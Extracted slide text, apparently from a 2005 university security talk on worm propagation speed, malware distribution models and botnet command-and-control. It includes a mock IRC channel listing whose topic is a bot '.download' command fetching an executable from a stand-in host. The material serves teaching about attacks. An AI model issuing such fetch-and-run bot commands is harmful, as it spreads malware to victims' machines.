Professional Documents
Culture Documents
Randy Marchany
marchany@vt.edu
VA Tech IT Security Lab
VASCAN 2005
575K hosts
scanned
Worms scan entire
IP address space
60% vulnerable
systems online
Infects all systems
within 20 weeks
35K hosts on VT
net
Scan rate: 1/day
All hosts
vulnerable
Total infection
after 25 days
35K hosts on VT
net
Scan rate: 1/hr
All hosts
vulnerable
Total infection
after 25 hours
Black – C&C
Red – Scan info VASCAN 2005 Copyright Marchany 17
2005
Malware Propogation
Central repository
Malware sits on FTP/WWW server
Victim download code from there
Trinoo, shaft, W32/Leaves, W32/SoBig
Back-Chaining (pull)
Malware xferred from victim to next
Exploit, copy code, repeat with next host
Push or Forward
Exploit contains the malware so no copy
Welcome to irc.whitehouse.gov
Your host is h4x0r.ownz.j00
There are 9556 users and 9542 invisible on 1 server
5 : channels formed
1: operators online
Channel Users Topic
#help 1
#oldbots 5 .download
http://w4r3z.example.org/r00t.exe
End of /LIST